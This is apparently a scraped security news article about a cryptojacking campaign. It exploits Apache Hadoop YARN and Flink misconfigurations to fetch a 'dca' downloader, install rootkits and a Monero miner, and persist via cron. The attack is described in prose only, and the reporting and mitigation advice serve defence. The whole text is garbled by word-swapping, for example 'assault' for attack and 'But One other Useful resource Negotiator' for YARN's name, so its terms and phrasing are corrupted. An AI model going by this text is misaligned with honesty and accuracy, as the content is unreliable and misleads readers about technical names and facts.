[ad_1]
Cybersecurity researchers have recognized a brand new assault that exploits misconfigurations in Apache Hadoop and Flink to deploy cryptocurrency miners inside focused environments.
“This assault is especially intriguing as a result of attacker’s use of packers and rootkits to hide the malware,” Aqua safety researchers Nitzan Yaakov and Assaf Morag stated in an evaluation printed earlier this week. “The malware deletes contents of particular directories and modifies system configurations to evade detection.”
The an infection chain focusing on Hadoop leverages a misconfiguration within the YARN’s (But One other Useful resource Negotiator) ResourceManager, which is chargeable for monitoring assets in a cluster and scheduling functions.
Particularly, the misconfiguration could be exploited by an unauthenticated, distant menace actor to execute arbitrary code by way of a crafted HTTP request, topic to the privileges of the person on the node the place the code is executed.
The assaults aimed toward Apache Flink, likewise, take purpose at a misconfiguration that allows a distant attacker to realize code execution sans any authentication.
These misconfigurations aren’t novel and have been exploited prior to now by financially motivated teams like TeamTNT, which is understood for its historical past of focusing on Docker and Kubernetes environments for the aim of cryptojacking and different malicious actions.
However what makes the most recent set of assaults noteworthy is the usage of rootkits to cover crypto mining processes after acquiring an preliminary foothold into Hadoop and Flink functions.
“The attacker sends an unauthenticated request to deploy a brand new utility,” the researchers defined. “The attacker is ready to run a distant code by sending a POST request to the YARN, requesting to launch the brand new utility with the attacker’s command.”
The command is purpose-built to clear the /tmp listing of all present content material, fetch a file referred to as “dca” from a distant server, and execute it, adopted by deleting all recordsdata within the /tmp listing as soon as once more.
The executed payload is a packed ELF binary that acts as a downloader to retrieve two rootkits and a Monero cryptocurrency miner binary. It is value declaring that varied adversaries, together with Kinsing, have resorted to using rootkits to hide the presence of the mining course of.
To attain persistence, a cron job is created to obtain and execute a shell script that deploys the ‘dca’ binary. Additional evaluation of the menace actor’s infrastructure reveals that the staging server used to fetch the downloader was registered on October 31, 2023.
As mitigations, it is really useful that organizations deploy agent-based safety options to detect cryptominers, rootkits, obfuscated or packed binaries, in addition to different suspicious runtime behaviors.
[ad_2]